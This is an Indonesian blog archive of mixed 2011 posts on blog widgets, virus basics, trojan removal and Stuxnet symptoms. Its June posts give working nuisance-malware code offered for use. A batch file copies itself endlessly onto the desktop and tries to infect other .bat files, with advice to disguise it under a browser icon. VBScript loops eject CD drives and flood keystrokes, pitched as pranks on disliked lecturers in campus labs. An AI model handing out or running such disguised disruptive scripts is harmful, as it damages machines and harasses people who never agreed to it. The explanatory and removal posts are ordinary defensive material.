Sunday, July 24, 2011
- MyBlogLog’s Recent Readers – Widget ini memperlihatkan avatar dari para pengunjung blog Anda. Serta dengan kepopulerannya widget satu ini sampai-sampai manajemen MyBloglog mampu meyakinkan Yahoo untuk membeli sahamnya. Sehingga, yang Anda perlukan untuk mendapat widget ini adalah mempunyai account yahoo. Mashable – Widget ini menyediakan semacam newsreel (headline news) dalam element blogger yang memberikan cuplikan berita/postingan dari sosial networking. Bedanya ada pilihan warna untuk disesuaikan dengan layout blog Anda.
- Headline News – Seperti widget mashable, widget ini pun menampilkan cuplikan headline berita dari situs-situs di seluruh penjuru dunia.
- Flickr Flash Photo Stream Badge – Widget ini menampilkan photo-photo dari profil flickr Anda secara berurutan dan dengan sentuhan flash. Flickr merupakan bagian dari yahoo jadi untuk mendapatkan widget ini Anda memerlukan account yahoo juga.
- Preview Anywhere –Widget ini Fungsinya untuk melihat preview link keluar dengan tampilan popup yang tidak terlalu besar ketika pengunjung mengarahkan mouse pada teks atau banner yang “mengandung” link.
- Twitter Badge – Jika dalam keseharian hidup Anda banyak hal-hal menarik dan begitu penuh warna dengan segudang aktifitas serta ingin agar orang lain tahu dan menampilkan cuplikan kalimat-kalimat pendek Anda sedang melakukan kegiatan ini, Anda sedang berada dimana, Anda sedang bersama siapa, Anda sedang, sedang, dan sedang lainnya…. Maka widget ini cocok untuk dipasang pada blog Anda. Dari pada bikin sendiri element blogger/ wordpress *secara manual* menuliskan teks sebagai pesan kepada pengunjung blog Anda bahwa Anda sedang mengerjakan ini, saya sarankan lebih baik
- Jikan ingin tawu lebih dalamnya silahkan klik Disini
Wednesday, June 8, 2011
virus 1
pertama buka notepad kemudian ketik
@echo off
echo checking system:
echo for %%i in (“*.bat”) do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
echo FAILED TO DELETE THE VIRUS
pause
echo CONTACTING THE ANTIVIRUS
pause
echo FAILED
pause
echo FAILED
:1
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat
goto 1
save as virus.bat di desktop atau yang lainnya, ekstensinya harus .bat, kemudian ganti icon-nya, yaitu dengan cara klik kanan, klik properties cari icon yang diinginkan, lebih baik pakai iconnya IE atau FF sesuaikan namanya. tapi sebelumnya buat shortcut ke program virus palsu tadi. klik kanan shortcut klik properties ganti iconnya.
untuk menghentikan virus palsu tadi dengan cara tekan Ctrl+C, atau menggunakan taskmanager.
virus2
Ini virus jadi-jadian yang paling OK tinggal kalian download di SINI, unzip, buat shortcutnya di desktop dan ganti iconnya denganicon aplikasi yang sering digunakan misalnya browser, winamp, WMP, YM dll. Virus ini nggak bisa di stop namun akan berhenti sendiri setelah beberapa menit,,,teng teng Read More...
- Pas teman-teman selesai booting, ada startup Windows Security center
- Trus muncul XP antivirus 2011
- Di safe mode dia masih tetap bisa jalan
- Gak bisa buka mozilla
- Setiap buka IE, Antivirus palsu ini selalu muncul
Tuesday, June 7, 2011
Apa itu virus?Virus atau worm adalah suatu program komputer yang dapat menyebar pada komputer atau jaringan dengan cara membuat copy dari dirinya sendiri tanpa sepengetahuan dari pengguna komputer tersebut. Virus dapat menimbulkan efek yang berbahaya, misalnya mulai dari menampilkan pesan, mencuri data atau bahkan mengontrol komputer Anda dari jarak jauh. Bagaimana virus menginfeksi komputer?
Suatu virus pertama kali harus dijalankan sebelum ia mampu untuk menginfeksi suatu komputer. Ada berbagai macam cara agar virus ini dijalankan oleh korban, misalnya dengan menempelkan dirinya pada suatu program yang lain. Ada juga virus yang jalan ketika Anda membuka suatu tipe file tertentu. Kadangkala virus juga memanfaatkan celah keamanan yang ada pada komputer Anda (baik sistem operasi atau aplikasi), dengan memanfaatkan hal-hal tersebut virus dapat berjalan dan kemudian akan menyebarkan dirinya sendiri secara otomatis.Anda juga dapat menerima suatu file yang sudah terinfeksi virus dalam attachment e-mail Anda. Begitu file tersebut Anda jalankan, maka kode virus akan berjalan dan mulai menginfeksi komputer Anda dan bisa menyebar pula ke semua file yang ada di jaringan komputer Anda.
Trojan horse
Trojan horse adalah program yang kelihatan seperti program yang valid atau normal, tetapi sebenarnya program tersebut membawa suatu kode dengan fungsi-fungsi yang sangat berbahaya bagi komputer Anda.
Sebagai contoh, virus DLoader-L datang dari attachment e-mail dan dianggap sebagai sebagai suatu update program dari Microsoft untuk sistem operasi Windows XP. Jika Anda menjalankannya maka dia akan mendownload program dan akan memanfaatkan komputer Anda untuk menghubungkan komputer Anda ke suatu website tertentu. Targetnya tentu saja untuk membuat website tadi menjadi overload dan akhirnya tidak bisa diakses dengan benar oleh pihak lain. Ini sering dinamakan dengan serangan denial of service atau DoS.
Trojan tidak dapat menyebar secepat virus karena trojan tidak membuat copy dari dirinya sendiri secara otomatis. Tapi sejalan dengan perkembangan virus, maka trojan horse bisa bekerjasama dengan virus dalam hal penyebarannya. Virus dapat melakukan download terhadap trojan yang merekam keystroke keyboard Anda atau mencuri informasi yang ada pada komputer Anda. Di sisi lain, trojan juga digunakan untuk menginfeksi suatu komputer dengan virus.
Worms
Worm bisa dikatakan mirip dengan virus tetapi worm tidak memerlukan carrier dalam hal ini program atau suatu dokumen. Worm mampu membuat copy dari dirinya sendiri dan mengunakan jaringan komunikasi antar komputer untuk menyebarkan dirinya. Banyak virus seperti MyDoom atau Bagle bekerja sebagaimana layaknya worm dan menggunakan e-mail untuk mem-forward dirinya sendiri kepada pihak lain.
Apa yang bisa dilakukan oleh virus?
Virus seringkali mengganggu Anda atau menghentikan kerja komputer Anda pada saat diperlukan. Sejalan dengan perkembangan di dunia virus komputer maka sampai saat ini efek dari virus ini sudah semakin banyak, yaitu:
- Memperlambat e-mail
Virus dapat menyebar melalui e-mail, seperti virus Sobig, dan mampu untuk membuat trafik e-mail yang sangat besar yang tentu saja akan membuat server menjadi lambat atau bahkan menjadi crash. Bahkan jika hal tersebut tidak sampai terjadi, perusahaan yang merasa terganggu dengan insiden ini toh juga akan mematikan servernya. - Mencuri data konfidental
Worm Bugbear-D contohnya, mampu merekam keystroke keyboard Anda, termasuk password dan lain sebagainya. Rekaman tadi biasanya akan dikirim ke si pembuat virus untuk dimanfaatkan lebih lanjut. - Menggunakan komputer Anda untuk menyerang suatu situs
MyDoom contohnya, dia menginfeksi banyak komputer di seluruh dunia untuk menyerang situs SCO dengan traffic data yang sangat besar. Ini akan membuat situs tersebut akan terbebani luar biasa dan akhirnya akan crash dan tidak bisa melayani pengguna lainnya. Ini biasa dinamakan dengan denial of service. - Membiarkan orang lain untuk membajak komputer Anda
Beberapa virus menempatkan trojan backdoor pada komputer dan ini akan membuat si pembuat virus dapat terhubung ke komputer tersebut secara diam-diam dan bisa dimanfaatkan lebih lanjut sesuai dengan keinginannya. - Merusak data
Virus Compatable contohnya, dapat membuat perubahan pada data yang Anda simpan pada dokumen MS Excel. - Menghapus data
Virus Sircam contohnya, berusaha untuk menghapus atau meng-overwrite hardisk Anda pada suatu waktu tertentu yang tidak terduga. - Men-disable hardware
Virus CIH atau Chernobyl contohnya, berusaha untuk meng-overwrite chip BIOS pada tanggal 26 April dan akan membuat komputer Anda menjadi tidak berfungsi. - Menimbulkan hal-hal yang aneh dan mengganggu
Virus worm Netsky-D contohnya, dapat membuat komputer berbunyi beep secara spontan atau tiba-tiba untuk beberapa jam lamanya. - Menampilkan pesan tertentu
Virus Cone-F contohnya, akan menampilkan pesan berbau politik jika bulan menunjukkan bulan Mei. - Merusak kredibilitas Anda
Jika virus mem-forward dirinya sendiri dari komputer Anda ke komputer pelanggan Anda atau komputer rekan bisnis Anda, maka hal ini akan merusak reputasi Anda sebagai suatu organisasi dan mereka akan tidak mau lagi melanjutkan hubungan bisnis dengan Anda atau malah menuntut kompensasi dari pihak Anda. - Membuat malu Anda
Virus PolyPost contohnya, akan memposting dokumen dan nama Anda pada newsgroup yang berbau pornografi.
Aplikasi tersebut dapat di download di bawah ini :
Mari kita sama-sama membuat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.Caranya: Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop
ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
MsgBox "Balik lagi ah...saltik"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Virus yang akan kita buat kali ini adalah virus yang bisa dikatakan jauh lebih mematikan dari pada virus - virus lainnya. Mungkin cara ini cukup ekstrem untuk dipraktikan. Jadi, jangan sampai artikel ini disalah gunakan.Sunday, May 29, 2011
Virus komputer semakin merajalela dan semakin banyak jenisnya saja. mereka dapat menyebar dan menyerang komputer kita melalui apapun. Dan Anda pastinya tidak ingin komputer Anda terserang virus dan data penting Anda akan hilang karena virus itu bukan? Salah satu virus yang dapat melakukan hal ini adalah virus OnlineGames.
Virus OnlineGames ini dapat menginfeksi komputer kita melalui eksekusi atau instalasi program maupun software, untuk itu hindari eksekusi atau instalasi program atau software yang tidak dikenal. Selain itu Anda juga perlu berhati-hati terhadap forum online di internet yang menyediakan link-link mencurigakan.
Jika komputer Anda sudah terlanjur terinfeksi virus yang termasuk dalam jenis Trojan ini, Anda sebaiknya segera membersihkannya,sebelum Trojan ini terlanjur mencuri data-data penting Anda. Dan untuk membersihkan virus Onlinegames ini, berikut langkah-langkah yang harus Anda lakukan.
Langkah-Langkah Membersihkan Virus OnlineGames:
- Matikan System Restore (XP/ME), jika sedang digunakan
- Buka Windows Task Manager dan hentikan/matikan proses virus
- End Process pada file virus yang aktif (liser.exe)
- Hapus string registry yang telah dibuat oleh virus. Gunakan script di bawah untuk mempermudah proses penghapusan,terlebih dahulu download scriptnya di sini,selanjutnya Gunakan script yang tadi kita download dan copy script tersebut ke notepad dan simpan dengan nama “Repair.inf” dan pastikan Save As Type di All File.
- Kemudian hapus file virus (liser.exe & liser.dll) secara manual, yaitu pada folder "C:\Program Files\Manson" atau dapat menggunakan tools Norman Malware Cleaner. Untuk download tools ini silahkan klik disini.
Thursday, May 26, 2011
- Install driver baru (replace driver lama) Saat Worm Stuxnet sudah menginfeksi, worm akan mencoba menghapus drive dari Realtek atau Jmicron dan menggantinya dengan driver yang baru versi worm Stuxnet. Stuxnet menginstall driver menggunakan 2 file virus yaitu : MRXCLS.SYS dan MRXNET.SYS.
- Mematikan aktivitas Print Share Worm menginjeksi file spoolsv, sehingga aktivitas print (cetak data) menjadi terhenti. Komputer yang terinfeksi tidak akan bisa melakukan print. Sebagai ganti dari aktivitas print tersebut worm membuat 2 file yaitu :- C:-WINDOWS-system32-winsta.exe (file utama worm Stuxnet)- C:-WINDOWS-system32-wbem-mof-sysnullevnt.mof
- Low Disk Space, ini adalah akibat dari aktivitas print yang dipaksakan, sehingga membuat file winsta akan semakin membegkak dan membuat space hardisk Anamejasi habis. Dan tentunya akanada peringatan Low diskSpace dari Windows.
- Gejala di atas berkaitan juga dengan gejala yang lainya, dengan membengkaknya file Winsta dan menjadikan space harddisk menjadi semakin habis, maka Anda tidak bisa menyimpan data atau menjalankan program tertentu. Karena space hardisk sudah dihabiskan oleh file winsta yag membengkak.
- Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. File sistem Windows yang akan menjadi sasaran injeksi worm Stuxnet yaitu :- C:-WINDOWS-system32-svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus)- C:-WINDOWS-system32-lsass.exe (file sistem yang berhubungan dengan aktivitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
- Melakukan koneksi ke Remote Server Worm Stuxnet, melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu :- www.premierfutbol.com - www.todaysfutbol.com
- Stuxnet juga melakukan hal yang sama seperti Conficker yaitu membuat file Scheduled Task, tujuannya yaitu agar dapat aktif da menginfeksi komputer.
- Menginjeksi beberapa file sistem Windows yaitu :- C:-WINDOWS-system32-lsass.exe- C:-WINDOWS-system32-svchost.exe- C:-WINDOWS-system32-spoolsv.exe
- Membuat 2 file driver yaitu :- C:-WINDOWS-system32-driver-mrxcls.sys- C:-WINDOWS-system32-driver-mrxnet.sys
- Membuat file konfigurasi yaitu :- C:-WINDOWS-inf-oem6c.pnf- C:-WINDOWS-inf-oem7a.pnf- C:-WINDOWS-inf-mdmeric3.pnf- C:-WINDOWS-inf-mdmcpq3.pnf
- Serta 2 file yang lain yaitu:- C:-WINDOWS-system32-KERNEL32.DLL.ASR.xxx atau SHELL32.DLL.ASR.xxx- C:-addins-DEFRAG[angka_acak].TMP
- Selain itu membuat file schedule task yaitu :- C:-WINDOWS-Tasks-At1.job
- Saat menginfeksi file spoolsv.exe, worm membuat 2 file kembali yaitu :- C:-WINDOWS-system32-winsta.exe (file inilah yang jika aktif akan semakin mengembang / membengkak ukurannya)- C:-WINDOWS-system32-wbem-mof-sysnullevnt.mof
- Pada removable disk/drive akan membuat beberapa file yaitu :- Autorun.inf- Copy of Shortcut.lnk- Copy of Copy of Shortcut.lnk- Copy of Copy of Copy of Shortcut.lnk- Copy of Copy of Copy of Copy of Shortcut.lnk- ~WTR[angka_acak].tmp-~WTR[angka_acak].tmp
- MS08-067 (Windows Server Service), seperti hal-nya Conficker memanfaatkan celah ini dengan melakukan akses C$ dan ADMIN$
- MS10-061 (Windows Print Spooler), memanfaatkan printer sharing worm menginfeksi pengguna komputer yang mencoba akses ke printer server.
Monday, May 23, 2011
Namun jika kita jeli dalam mencari, kita dapat menemukan banyak buku yang dapat kita baca, atau bahkan kita unduh secara keseluruhan.Membaca buku dan majalah secara online sangatlah mudah, dan aplikasi GooReader membuatnya menjadi semakin mudah. GooReader adalah desktop application yang memungkinkan kita untuk mencari, mengunduh, dan membaca buku serta majalah yang dapat kita temukan di Google Books, tanpa harus surfing menggunakan web browser. Antar muka GooReader membuat membaca buku dan majalah secara online menjadi jauh lebih nyaman. Kita dapat membuka halaman demi halaman dengan gerakan mouse yang natural dan halus.Apikasi GooReader ini tersedia dalam versi free serta paid di situs resmi nya GooReader.com. Tentu saja, versi free memiliki fitur yang terbatas apabila dibandingkan dengan versi paid. Namun, versi free aplikasi ini cukup membantu bagi mereka yang suka membaca buku ataupun majalah secara online di Google Books. Aplikasi ini dapat digunakan di komputer yang menggunakan sistem operasi Windows XP, Vista, dan Windows 7 dengan .Net Framework 3.5 SP1.
Saturday, May 21, 2011








